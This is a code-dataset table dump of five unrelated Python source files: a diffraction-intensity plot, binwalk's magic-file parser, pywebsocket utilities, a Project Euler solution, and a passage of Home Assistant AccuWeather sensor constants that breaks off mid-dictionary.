text
stringlengths 6
947k
| repo_name
stringlengths 5
100
| path
stringlengths 4
231
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 6
947k
| score
float64 0
0.34
|
---|---|---|---|---|---|---|
def diff_int(d=0.01*u.cm,a=0.001*u.cm,wl=400*u.nm):
'''
function that returns the intensity of a double slit interference pattern
'''
theta = arange(-10,10,1e-5)*u.degree
x = pi*a*sin(theta)/wl*u.radian
xnew = x.decompose()
i_single = (sin(xnew)/xnew)**2
y = pi*d*sin(theta)/wl*u.radian
ynew = y.decompose()
i_double = (cos(ynew))**2
I = i_single*i_double
plot(theta,I)
return
|
kfollette/ASTR200-Spring2017
|
Homework/diff_int.py
|
Python
|
mit
| 441 | 0.022676 |
# Code for performing minimal parsing of libmagic-compatible signature files.
# This allows for building a single signature file from multiple other signature files,
# and for parsing out the initial magic signature bytes for each signature (used for
# pre-processing of data to limit the number of actual calls into libmagic).
#
# Also performs splitting/formatting of libmagic result text.
import io
import re
import os.path
import tempfile
import binwalk.core.common
from binwalk.core.compat import *
from binwalk.core.filter import FilterType
class MagicSignature(object):
def __init__(self, **kwargs):
self.offset = 0
self.type = ''
self.condition = ''
self.description = ''
self.length = 0
for (k,v) in iterator(kwargs):
try:
v = int(v, 0)
except KeyboardInterrupt as e:
raise e
except Exception:
pass
setattr(self, k, v)
class MagicParser(object):
'''
Class for loading, parsing and creating libmagic-compatible magic files.
This class is primarily used internally by the Binwalk class, and a class instance of it is available via the Binwalk.parser object.
One useful method however, is file_from_string(), which will generate a temporary magic file from a given signature string:
import binwalk
bw = binwalk.Binwalk()
# Create a temporary magic file that contains a single entry with a signature of '\\x00FOOBAR\\xFF', and append the resulting
# temporary file name to the list of magic files in the Binwalk class instance.
bw.magic_files.append(bw.parser.file_from_string('\\x00FOOBAR\\xFF', display_name='My custom signature'))
bw.scan('firmware.bin')
All magic files generated by this class will be deleted when the class deconstructor is called.
'''
BIG_ENDIAN = 'big'
LITTLE_ENDIAN = 'little'
MAGIC_STRING_FORMAT = "%d\tstring\t%s\t%s\n"
DEFAULT_DISPLAY_NAME = "Raw string signature"
WILDCARD = 'x'
# If libmagic returns multiple results, they are delimited with this string.
RESULT_SEPERATOR = "\\012- "
def __init__(self, filter=None, smart=None):
'''
Class constructor.
@filter - Instance of the MagicFilter class. May be None if the parse/parse_file methods are not used.
@smart - Instance of the SmartSignature class. May be None if the parse/parse_file methods are not used.
Returns None.
'''
self.matches = set([])
self.signatures = {}
self.filter = filter
self.smart = smart
self.raw_fd = None
self.signature_count = 0
self.signature_set = set()
def __del__(self):
try:
self.cleanup()
except KeyboardInterrupt as e:
raise e
except Exception:
pass
def rm_magic_files(self):
'''
Cleans up the temporary magic file(s).
Returns None.
'''
try:
self.fd.close()
except KeyboardInterrupt as e:
raise e
except Exception:
pass
try:
self.raw_fd.close()
except KeyboardInterrupt as e:
raise e
except Exception:
pass
def cleanup(self):
'''
Cleans up any tempfiles created by the class instance.
Returns None.
'''
self.rm_magic_files()
def file_from_string(self, signature_string, offset=0, display_name=DEFAULT_DISPLAY_NAME):
'''
Generates a magic file from a signature string.
This method is intended to be used once per instance.
If invoked multiple times, any previously created magic files will be closed and deleted.
@signature_string - The string signature to search for.
@offset - The offset at which the signature should occur.
@display_name - The text to display when the signature is found.
Returns the name of the generated temporary magic file.
'''
self.raw_fd = tempfile.NamedTemporaryFile()
self.raw_fd.write(str2bytes(self.MAGIC_STRING_FORMAT % (offset, signature_string, display_name)))
self.raw_fd.seek(0)
return self.raw_fd.name
def parse(self, file_name):
'''
Parses magic file(s) and contatenates them into a single temporary magic file
while simultaneously removing filtered signatures.
@file_name - Magic file, or list of magic files, to parse.
Returns the name of the generated temporary magic file, which will be automatically
deleted when the class deconstructor is called.
'''
self.matches = set([])
self.signatures = {}
self.signature_count = 0
self.fd = tempfile.NamedTemporaryFile()
if isinstance(file_name, type([])):
files = file_name
else:
files = [file_name]
for fname in files:
if fname:
if os.path.exists(fname) and os.path.isfile(fname):
self.parse_file(fname)
else:
binwalk.core.common.warning("Magic file '%s' does not exist!" % fname)
self.fd.seek(0)
return self.fd.name
def parse_file(self, file_name):
'''
Parses a magic file and appends valid signatures to the temporary magic file, as allowed
by the existing filter rules.
@file_name - Magic file to parse.
Returns None.
'''
# Default to not including signature entries until we've
# found what looks like a valid entry.
include = False
line_count = 0
try:
fp = open(file_name, 'rb')
for line in fp.readlines():
line = bytes2str(line)
line_count += 1
# Check if this is the first line of a signature entry
entry = self._parse_line(line)
if entry is not None:
# If this signature is marked for inclusion, include it.
if self.filter.filter(entry.description) == FilterType.FILTER_INCLUDE:
include = True
self.signature_count += 1
if not has_key(self.signatures, entry.offset):
self.signatures[entry.offset] = []
if entry.condition not in self.signatures[entry.offset]:
self.signatures[entry.offset].append(entry.condition)
else:
include = False
# Keep writing lines of the signature to the temporary magic file until
# we detect a signature that should not be included.
if include:
self.fd.write(str2bytes(line))
fp.close()
self.build_signature_set()
except KeyboardInterrupt as e:
raise e
except Exception as e:
raise Exception("Error parsing magic file '%s' on line %d: %s" % (file_name, line_count, str(e)))
def _parse_line(self, line):
'''
Parses a signature line into its four parts (offset, type, condition and description),
looking for the first line of a given signature.
@line - The signature line to parse.
Returns a dictionary with the respective line parts populated if the line is the first of a signature.
Returns a dictionary with all parts set to None if the line is not the first of a signature.
'''
entry = MagicSignature()
# Quick and dirty pre-filter. We are only concerned with the first line of a
# signature, which will always start with a number. Make sure the first byte of
# the line is a number; if not, don't process.
if line[:1] < '0' or line[:1] > '9':
return None
try:
# Split the line into white-space separated parts.
# For this to work properly, replace escaped spaces ('\ ') with '\x20'.
# This means the same thing, but doesn't confuse split().
line_parts = line.replace('\\ ', '\\x20').split()
entry.offset = line_parts[0]
entry.type = line_parts[1]
# The condition line may contain escaped sequences, so be sure to decode it properly.
entry.condition = string_decode(line_parts[2])
entry.description = ' '.join(line_parts[3:])
except KeyboardInterrupt as e:
raise e
except Exception as e:
raise Exception("%s :: %s", (str(e), line))
# We've already verified that the first character in this line is a number, so this *shouldn't*
# throw an exception, but let's catch it just in case...
try:
entry.offset = int(entry.offset, 0)
except KeyboardInterrupt as e:
raise e
except Exception as e:
raise Exception("%s :: %s", (str(e), line))
# If this is a string, get the length of the string
if 'string' in entry.type or entry.condition == self.WILDCARD:
entry.length = len(entry.condition)
# Else, we need to jump through a few more hoops...
else:
# Default to little endian, unless the type field starts with 'be'.
# This assumes that we're running on a little endian system...
if entry.type.startswith('be'):
endianess = self.BIG_ENDIAN
else:
endianess = self.LITTLE_ENDIAN
# Try to convert the condition to an integer. This does not allow
# for more advanced conditions for the first line of a signature,
# but needing that is rare.
try:
intval = int(entry.condition.strip('L'), 0)
except KeyboardInterrupt as e:
raise e
except Exception as e:
raise Exception("Failed to evaluate condition for '%s' type: '%s', condition: '%s', error: %s" % (entry['description'], entry['type'], entry['condition'], str(e)))
# How long is the field type?
if entry.type == 'byte':
entry.length = 1
elif 'short' in entry.type:
entry.length = 2
elif 'long' in entry.type:
entry.length = 4
elif 'quad' in entry.type:
entry.length = 8
# Convert the integer value to a string of the appropriate endianess
entry.condition = self._to_string(intval, entry.length, endianess)
return entry
def build_signature_set(self):
'''
Builds a set of signature tuples.
Returns a set of tuples in the format: [(<signature offset>, [signature regex])].
'''
self.signature_set = set()
for (offset, sigs) in iterator(self.signatures):
for sig in sigs:
if sig == self.WILDCARD:
sig = re.compile('.')
else:
sig = re.compile(re.escape(sig))
self.signature_set.add((offset, sig))
return self.signature_set
def find_signature_candidates(self, data, end):
'''
Finds candidate signatures inside of the data buffer.
Called internally by Binwalk.single_scan.
@data - Data to scan for candidate signatures.
@end - Don't look for signatures beyond this offset.
Returns an ordered list of offsets inside of data at which candidate offsets were found.
'''
candidate_offsets = []
for (offset, regex) in self.signature_set:
candidate_offsets += [(match.start() - offset) for match in regex.finditer(data) if (match.start() - offset) < end and (match.start() - offset) >= 0]
candidate_offsets = list(set(candidate_offsets))
candidate_offsets.sort()
return candidate_offsets
def _to_string(self, value, size, endianess):
'''
Converts an integer value into a raw string.
@value - The integer value to convert.
@size - Size, in bytes, of the integer value.
@endianess - One of self.LITTLE_ENDIAN | self.BIG_ENDIAN.
Returns a raw string containing value.
'''
data = ""
for i in range(0, size):
data += chr((value >> (8*i)) & 0xFF)
if endianess != self.LITTLE_ENDIAN:
data = data[::-1]
return data
def split(self, data):
'''
Splits multiple libmagic results in the data string into a list of separate results.
@data - Data string returned from libmagic.
Returns a list of result strings.
'''
try:
return data.split(self.RESULT_SEPERATOR)
except KeyboardInterrupt as e:
raise e
except Exception:
return []
|
17twenty/binwalk
|
src/binwalk/core/parser.py
|
Python
|
mit
| 13,154 | 0.004485 |
# Copyright 2011, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""WebSocket utilities.
"""
import array
import errno
# Import hash classes from a module available and recommended for each Python
# version and re-export those symbol. Use sha and md5 module in Python 2.4, and
# hashlib module in Python 2.6.
try:
import hashlib
md5_hash = hashlib.md5
sha1_hash = hashlib.sha1
except ImportError:
import md5
import sha
md5_hash = md5.md5
sha1_hash = sha.sha
import StringIO
import logging
import os
import re
import socket
import traceback
import zlib
def get_stack_trace():
"""Get the current stack trace as string.
This is needed to support Python 2.3.
TODO: Remove this when we only support Python 2.4 and above.
Use traceback.format_exc instead.
"""
out = StringIO.StringIO()
traceback.print_exc(file=out)
return out.getvalue()
def prepend_message_to_exception(message, exc):
"""Prepend message to the exception."""
exc.args = (message + str(exc),)
return
def __translate_interp(interp, cygwin_path):
"""Translate interp program path for Win32 python to run cygwin program
(e.g. perl). Note that it doesn't support path that contains space,
which is typically true for Unix, where #!-script is written.
For Win32 python, cygwin_path is a directory of cygwin binaries.
Args:
interp: interp command line
cygwin_path: directory name of cygwin binary, or None
Returns:
translated interp command line.
"""
if not cygwin_path:
return interp
m = re.match('^[^ ]*/([^ ]+)( .*)?', interp)
if m:
cmd = os.path.join(cygwin_path, m.group(1))
return cmd + m.group(2)
return interp
def get_script_interp(script_path, cygwin_path=None):
"""Gets #!-interpreter command line from the script.
It also fixes command path. When Cygwin Python is used, e.g. in WebKit,
it could run "/usr/bin/perl -wT hello.pl".
When Win32 Python is used, e.g. in Chromium, it couldn't. So, fix
"/usr/bin/perl" to "<cygwin_path>\perl.exe".
Args:
script_path: pathname of the script
cygwin_path: directory name of cygwin binary, or None
Returns:
#!-interpreter command line, or None if it is not #!-script.
"""
fp = open(script_path)
line = fp.readline()
fp.close()
m = re.match('^#!(.*)', line)
if m:
return __translate_interp(m.group(1), cygwin_path)
return None
def wrap_popen3_for_win(cygwin_path):
"""Wrap popen3 to support #!-script on Windows.
Args:
cygwin_path: path for cygwin binary if command path is needed to be
translated. None if no translation required.
"""
__orig_popen3 = os.popen3
def __wrap_popen3(cmd, mode='t', bufsize=-1):
cmdline = cmd.split(' ')
interp = get_script_interp(cmdline[0], cygwin_path)
if interp:
cmd = interp + ' ' + cmd
return __orig_popen3(cmd, mode, bufsize)
os.popen3 = __wrap_popen3
def hexify(s):
return ' '.join(map(lambda x: '%02x' % ord(x), s))
def get_class_logger(o):
return logging.getLogger(
'%s.%s' % (o.__class__.__module__, o.__class__.__name__))
class NoopMasker(object):
"""A masking object that has the same interface as RepeatedXorMasker but
just returns the string passed in without making any change.
"""
def __init__(self):
pass
def mask(self, s):
return s
class RepeatedXorMasker(object):
"""A masking object that applies XOR on the string given to mask method
with the masking bytes given to the constructor repeatedly. This object
remembers the position in the masking bytes the last mask method call
ended and resumes from that point on the next mask method call.
"""
def __init__(self, mask):
self._mask = map(ord, mask)
self._mask_size = len(self._mask)
self._count = 0
def mask(self, s):
result = array.array('B')
result.fromstring(s)
# Use temporary local variables to eliminate the cost to access
# attributes
count = self._count
mask = self._mask
mask_size = self._mask_size
for i in xrange(len(result)):
result[i] ^= mask[count]
count = (count + 1) % mask_size
self._count = count
return result.tostring()
class DeflateRequest(object):
"""A wrapper class for request object to intercept send and recv to perform
deflate compression and decompression transparently.
"""
def __init__(self, request):
self._request = request
self.connection = DeflateConnection(request.connection)
def __getattribute__(self, name):
if name in ('_request', 'connection'):
return object.__getattribute__(self, name)
return self._request.__getattribute__(name)
def __setattr__(self, name, value):
if name in ('_request', 'connection'):
return object.__setattr__(self, name, value)
return self._request.__setattr__(name, value)
# By making wbits option negative, we can suppress CMF/FLG (2 octet) and
# ADLER32 (4 octet) fields of zlib so that we can use zlib module just as
# deflate library. DICTID won't be added as far as we don't set dictionary.
# LZ77 window of 32K will be used for both compression and decompression.
# For decompression, we can just use 32K to cover any windows size. For
# compression, we use 32K so receivers must use 32K.
#
# Compression level is Z_DEFAULT_COMPRESSION. We don't have to match level
# to decode.
#
# See zconf.h, deflate.cc, inflate.cc of zlib library, and zlibmodule.c of
# Python. See also RFC1950 (ZLIB 3.3).
class _Deflater(object):
def __init__(self, window_bits):
self._logger = get_class_logger(self)
self._compress = zlib.compressobj(
zlib.Z_DEFAULT_COMPRESSION, zlib.DEFLATED, -window_bits)
def compress_and_flush(self, bytes):
compressed_bytes = self._compress.compress(bytes)
compressed_bytes += self._compress.flush(zlib.Z_SYNC_FLUSH)
self._logger.debug('Compress input %r', bytes)
self._logger.debug('Compress result %r', compressed_bytes)
return compressed_bytes
class _Inflater(object):
def __init__(self):
self._logger = get_class_logger(self)
self._unconsumed = ''
self.reset()
def decompress(self, size):
if not (size == -1 or size > 0):
raise Exception('size must be -1 or positive')
data = ''
while True:
if size == -1:
data += self._decompress.decompress(self._unconsumed)
# See Python bug http://bugs.python.org/issue12050 to
# understand why the same code cannot be used for updating
# self._unconsumed for here and else block.
self._unconsumed = ''
else:
data += self._decompress.decompress(
self._unconsumed, size - len(data))
self._unconsumed = self._decompress.unconsumed_tail
if self._decompress.unused_data:
# Encountered a last block (i.e. a block with BFINAL = 1) and
# found a new stream (unused_data). We cannot use the same
# zlib.Decompress object for the new stream. Create a new
# Decompress object to decompress the new one.
#
# It's fine to ignore unconsumed_tail if unused_data is not
# empty.
self._unconsumed = self._decompress.unused_data
self.reset()
if size >= 0 and len(data) == size:
# data is filled. Don't call decompress again.
break
else:
# Re-invoke Decompress.decompress to try to decompress all
# available bytes before invoking read which blocks until
# any new byte is available.
continue
else:
# Here, since unused_data is empty, even if unconsumed_tail is
# not empty, bytes of requested length are already in data. We
# don't have to "continue" here.
break
if data:
self._logger.debug('Decompressed %r', data)
return data
def append(self, data):
self._logger.debug('Appended %r', data)
self._unconsumed += data
def reset(self):
self._logger.debug('Reset')
self._decompress = zlib.decompressobj(-zlib.MAX_WBITS)
# Compresses/decompresses given octets using the method introduced in RFC1979.
class _RFC1979Deflater(object):
"""A compressor class that applies DEFLATE to given byte sequence and
flushes using the algorithm described in the RFC1979 section 2.1.
"""
def __init__(self, window_bits, no_context_takeover):
self._deflater = None
if window_bits is None:
window_bits = zlib.MAX_WBITS
self._window_bits = window_bits
self._no_context_takeover = no_context_takeover
def filter(self, bytes):
if self._deflater is None or self._no_context_takeover:
self._deflater = _Deflater(self._window_bits)
# Strip last 4 octets which is LEN and NLEN field of a non-compressed
# block added for Z_SYNC_FLUSH.
return self._deflater.compress_and_flush(bytes)[:-4]
class _RFC1979Inflater(object):
"""A decompressor class for byte sequence compressed and flushed following
the algorithm described in the RFC1979 section 2.1.
"""
def __init__(self):
self._inflater = _Inflater()
def filter(self, bytes):
# Restore stripped LEN and NLEN field of a non-compressed block added
# for Z_SYNC_FLUSH.
self._inflater.append(bytes + '\x00\x00\xff\xff')
return self._inflater.decompress(-1)
class DeflateSocket(object):
"""A wrapper class for socket object to intercept send and recv to perform
deflate compression and decompression transparently.
"""
# Size of the buffer passed to recv to receive compressed data.
_RECV_SIZE = 4096
def __init__(self, socket):
self._socket = socket
self._logger = get_class_logger(self)
self._deflater = _Deflater(zlib.MAX_WBITS)
self._inflater = _Inflater()
def recv(self, size):
"""Receives data from the socket specified on the construction up
to the specified size. Once any data is available, returns it even
if it's smaller than the specified size.
"""
# TODO(tyoshino): Allow call with size=0. It should block until any
# decompressed data is available.
if size <= 0:
raise Exception('Non-positive size passed')
while True:
data = self._inflater.decompress(size)
if len(data) != 0:
return data
read_data = self._socket.recv(DeflateSocket._RECV_SIZE)
if not read_data:
return ''
self._inflater.append(read_data)
def sendall(self, bytes):
self.send(bytes)
def send(self, bytes):
self._socket.sendall(self._deflater.compress_and_flush(bytes))
return len(bytes)
class DeflateConnection(object):
"""A wrapper class for request object to intercept write and read to
perform deflate compression and decompression transparently.
"""
def __init__(self, connection):
self._connection = connection
self._logger = get_class_logger(self)
self._deflater = _Deflater(zlib.MAX_WBITS)
self._inflater = _Inflater()
def get_remote_addr(self):
return self._connection.remote_addr
remote_addr = property(get_remote_addr)
def put_bytes(self, bytes):
self.write(bytes)
def read(self, size=-1):
"""Reads at most size bytes. Blocks until there's at least one byte
available.
"""
# TODO(tyoshino): Allow call with size=0.
if not (size == -1 or size > 0):
raise Exception('size must be -1 or positive')
data = ''
while True:
if size == -1:
data += self._inflater.decompress(-1)
else:
data += self._inflater.decompress(size - len(data))
if size >= 0 and len(data) != 0:
break
# TODO(tyoshino): Make this read efficient by some workaround.
#
# In 3.0.3 and prior of mod_python, read blocks until length bytes
# was read. We don't know the exact size to read while using
# deflate, so read byte-by-byte.
#
# _StandaloneRequest.read that ultimately performs
# socket._fileobject.read also blocks until length bytes was read
read_data = self._connection.read(1)
if not read_data:
break
self._inflater.append(read_data)
return data
def write(self, bytes):
self._connection.write(self._deflater.compress_and_flush(bytes))
def _is_ewouldblock_errno(error_number):
"""Returns True iff error_number indicates that receive operation would
block. To make this portable, we check availability of errno and then
compare them.
"""
for error_name in ['WSAEWOULDBLOCK', 'EWOULDBLOCK', 'EAGAIN']:
if (error_name in dir(errno) and
error_number == getattr(errno, error_name)):
return True
return False
def drain_received_data(raw_socket):
# Set the socket non-blocking.
original_timeout = raw_socket.gettimeout()
raw_socket.settimeout(0.0)
drained_data = []
# Drain until the socket is closed or no data is immediately
# available for read.
while True:
try:
data = raw_socket.recv(1)
if not data:
break
drained_data.append(data)
except socket.error, e:
# e can be either a pair (errno, string) or just a string (or
# something else) telling what went wrong. We suppress only
# the errors that indicates that the socket blocks. Those
# exceptions can be parsed as a pair (errno, string).
try:
error_number, message = e
except:
# Failed to parse socket.error.
raise e
if _is_ewouldblock_errno(error_number):
break
else:
raise e
# Rollback timeout value.
raw_socket.settimeout(original_timeout)
return ''.join(drained_data)
# vi:sts=4 sw=4 et
|
CyanogenMod/android_external_chromium-trace
|
trace-viewer/third_party/pywebsocket/src/mod_pywebsocket/util.py
|
Python
|
bsd-3-clause
| 16,267 | 0.000184 |
# Claire Jaja
# 11/1/2014
#
# Project Euler
# Problem 2
# Even Fibonacci numbers
#
# Each new term in the Fibonacci sequence is generated by adding
# the previous two terms.
# By starting with 1 and 2, the first 10 terms will be:
# 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, ...
# By considering the terms in the Fibonacci sequence
# whose values do not exceed four million,
# find the sum of the even-valued terms.
def main():
max_value = 4000000
# set up first three terms
previous_previous_term = 1
previous_term = 1
current_term = 2
my_sum = 0
while current_term < max_value:
if current_term % 2 == 0:
my_sum += current_term
previous_previous_term = previous_term
previous_term = current_term
current_term = previous_term + previous_previous_term
print(my_sum)
if __name__ == "__main__":
main()
|
clairejaja/project-euler
|
src/main/python/problem2/even_fibonacci_numbers.py
|
Python
|
mit
| 876 | 0.001142 |
"""Constants for AccuWeather integration."""
from __future__ import annotations
from typing import Final
from homeassistant.components.weather import (
ATTR_CONDITION_CLEAR_NIGHT,
ATTR_CONDITION_CLOUDY,
ATTR_CONDITION_EXCEPTIONAL,
ATTR_CONDITION_FOG,
ATTR_CONDITION_HAIL,
ATTR_CONDITION_LIGHTNING,
ATTR_CONDITION_LIGHTNING_RAINY,
ATTR_CONDITION_PARTLYCLOUDY,
ATTR_CONDITION_POURING,
ATTR_CONDITION_RAINY,
ATTR_CONDITION_SNOWY,
ATTR_CONDITION_SNOWY_RAINY,
ATTR_CONDITION_SUNNY,
ATTR_CONDITION_WINDY,
)
from homeassistant.const import (
ATTR_DEVICE_CLASS,
ATTR_ICON,
CONCENTRATION_PARTS_PER_CUBIC_METER,
DEVICE_CLASS_TEMPERATURE,
LENGTH_FEET,
LENGTH_INCHES,
LENGTH_METERS,
LENGTH_MILLIMETERS,
PERCENTAGE,
SPEED_KILOMETERS_PER_HOUR,
SPEED_MILES_PER_HOUR,
TEMP_CELSIUS,
TEMP_FAHRENHEIT,
TIME_HOURS,
UV_INDEX,
)
from .model import SensorDescription
API_IMPERIAL: Final = "Imperial"
API_METRIC: Final = "Metric"
ATTRIBUTION: Final = "Data provided by AccuWeather"
ATTR_ENABLED: Final = "enabled"
ATTR_FORECAST: Final = "forecast"
ATTR_LABEL: Final = "label"
ATTR_UNIT_IMPERIAL: Final = "unit_imperial"
ATTR_UNIT_METRIC: Final = "unit_metric"
CONF_FORECAST: Final = "forecast"
COORDINATOR: Final = "coordinator"
DOMAIN: Final = "accuweather"
MANUFACTURER: Final = "AccuWeather, Inc."
MAX_FORECAST_DAYS: Final = 4
NAME: Final = "AccuWeather"
UNDO_UPDATE_LISTENER: Final = "undo_update_listener"
CONDITION_CLASSES: Final[dict[str, list[int]]] = {
ATTR_CONDITION_CLEAR_NIGHT: [33, 34, 37],
ATTR_CONDITION_CLOUDY: [7, 8, 38],
ATTR_CONDITION_EXCEPTIONAL: [24, 30, 31],
ATTR_CONDITION_FOG: [11],
ATTR_CONDITION_HAIL: [25],
ATTR_CONDITION_LIGHTNING: [15],
ATTR_CONDITION_LIGHTNING_RAINY: [16, 17, 41, 42],
ATTR_CONDITION_PARTLYCLOUDY: [3, 4, 6, 35, 36],
ATTR_CONDITION_POURING: [18],
ATTR_CONDITION_RAINY: [12, 13, 14, 26, 39, 40],
ATTR_CONDITION_SNOWY: [19, 20, 21, 22, 23, 43, 44],
ATTR_CONDITION_SNOWY_RAINY: [29],
ATTR_CONDITION_SUNNY: [1, 2, 5],
ATTR_CONDITION_WINDY: [32],
}
FORECAST_SENSOR_TYPES: Final[dict[str, SensorDescription]] = {
"CloudCoverDay": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-cloudy",
ATTR_LABEL: "Cloud Cover Day",
ATTR_UNIT_METRIC: PERCENTAGE,
ATTR_UNIT_IMPERIAL: PERCENTAGE,
ATTR_ENABLED: False,
},
"CloudCoverNight": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-cloudy",
ATTR_LABEL: "Cloud Cover Night",
ATTR_UNIT_METRIC: PERCENTAGE,
ATTR_UNIT_IMPERIAL: PERCENTAGE,
ATTR_ENABLED: False,
},
"Grass": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:grass",
ATTR_LABEL: "Grass Pollen",
ATTR_UNIT_METRIC: CONCENTRATION_PARTS_PER_CUBIC_METER,
ATTR_UNIT_IMPERIAL: CONCENTRATION_PARTS_PER_CUBIC_METER,
ATTR_ENABLED: False,
},
"HoursOfSun": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-partly-cloudy",
ATTR_LABEL: "Hours Of Sun",
ATTR_UNIT_METRIC: TIME_HOURS,
ATTR_UNIT_IMPERIAL: TIME_HOURS,
ATTR_ENABLED: True,
},
"Mold": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:blur",
ATTR_LABEL: "Mold Pollen",
ATTR_UNIT_METRIC: CONCENTRATION_PARTS_PER_CUBIC_METER,
ATTR_UNIT_IMPERIAL: CONCENTRATION_PARTS_PER_CUBIC_METER,
ATTR_ENABLED: False,
},
"Ozone": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:vector-triangle",
ATTR_LABEL: "Ozone",
ATTR_UNIT_METRIC: None,
ATTR_UNIT_IMPERIAL: None,
ATTR_ENABLED: False,
},
"Ragweed": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:sprout",
ATTR_LABEL: "Ragweed Pollen",
ATTR_UNIT_METRIC: CONCENTRATION_PARTS_PER_CUBIC_METER,
ATTR_UNIT_IMPERIAL: CONCENTRATION_PARTS_PER_CUBIC_METER,
ATTR_ENABLED: False,
},
"RealFeelTemperatureMax": {
ATTR_DEVICE_CLASS: DEVICE_CLASS_TEMPERATURE,
ATTR_ICON: None,
ATTR_LABEL: "RealFeel Temperature Max",
ATTR_UNIT_METRIC: TEMP_CELSIUS,
ATTR_UNIT_IMPERIAL: TEMP_FAHRENHEIT,
ATTR_ENABLED: True,
},
"RealFeelTemperatureMin": {
ATTR_DEVICE_CLASS: DEVICE_CLASS_TEMPERATURE,
ATTR_ICON: None,
ATTR_LABEL: "RealFeel Temperature Min",
ATTR_UNIT_METRIC: TEMP_CELSIUS,
ATTR_UNIT_IMPERIAL: TEMP_FAHRENHEIT,
ATTR_ENABLED: True,
},
"RealFeelTemperatureShadeMax": {
ATTR_DEVICE_CLASS: DEVICE_CLASS_TEMPERATURE,
ATTR_ICON: None,
ATTR_LABEL: "RealFeel Temperature Shade Max",
ATTR_UNIT_METRIC: TEMP_CELSIUS,
ATTR_UNIT_IMPERIAL: TEMP_FAHRENHEIT,
ATTR_ENABLED: False,
},
"RealFeelTemperatureShadeMin": {
ATTR_DEVICE_CLASS: DEVICE_CLASS_TEMPERATURE,
ATTR_ICON: None,
ATTR_LABEL: "RealFeel Temperature Shade Min",
ATTR_UNIT_METRIC: TEMP_CELSIUS,
ATTR_UNIT_IMPERIAL: TEMP_FAHRENHEIT,
ATTR_ENABLED: False,
},
"ThunderstormProbabilityDay": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-lightning",
ATTR_LABEL: "Thunderstorm Probability Day",
ATTR_UNIT_METRIC: PERCENTAGE,
ATTR_UNIT_IMPERIAL: PERCENTAGE,
ATTR_ENABLED: True,
},
"ThunderstormProbabilityNight": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-lightning",
ATTR_LABEL: "Thunderstorm Probability Night",
ATTR_UNIT_METRIC: PERCENTAGE,
ATTR_UNIT_IMPERIAL: PERCENTAGE,
ATTR_ENABLED: True,
},
"Tree": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:tree-outline",
ATTR_LABEL: "Tree Pollen",
ATTR_UNIT_METRIC: CONCENTRATION_PARTS_PER_CUBIC_METER,
ATTR_UNIT_IMPERIAL: CONCENTRATION_PARTS_PER_CUBIC_METER,
ATTR_ENABLED: False,
},
"UVIndex": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-sunny",
ATTR_LABEL: "UV Index",
ATTR_UNIT_METRIC: UV_INDEX,
ATTR_UNIT_IMPERIAL: UV_INDEX,
ATTR_ENABLED: True,
},
"WindGustDay": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-windy",
ATTR_LABEL: "Wind Gust Day",
ATTR_UNIT_METRIC: SPEED_KILOMETERS_PER_HOUR,
ATTR_UNIT_IMPERIAL: SPEED_MILES_PER_HOUR,
ATTR_ENABLED: False,
},
"WindGustNight": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-windy",
ATTR_LABEL: "Wind Gust Night",
ATTR_UNIT_METRIC: SPEED_KILOMETERS_PER_HOUR,
ATTR_UNIT_IMPERIAL: SPEED_MILES_PER_HOUR,
ATTR_ENABLED: False,
},
"WindDay": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-windy",
ATTR_LABEL: "Wind Day",
ATTR_UNIT_METRIC: SPEED_KILOMETERS_PER_HOUR,
ATTR_UNIT_IMPERIAL: SPEED_MILES_PER_HOUR,
ATTR_ENABLED: True,
},
"WindNight": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-windy",
ATTR_LABEL: "Wind Night",
ATTR_UNIT_METRIC: SPEED_KILOMETERS_PER_HOUR,
ATTR_UNIT_IMPERIAL: SPEED_MILES_PER_HOUR,
ATTR_ENABLED: True,
},
}
SENSOR_TYPES: Final[dict[str, SensorDescription]] = {
"ApparentTemperature": {
ATTR_DEVICE_CLASS: DEVICE_CLASS_TEMPERATURE,
ATTR_ICON: None,
ATTR_LABEL: "Apparent Temperature",
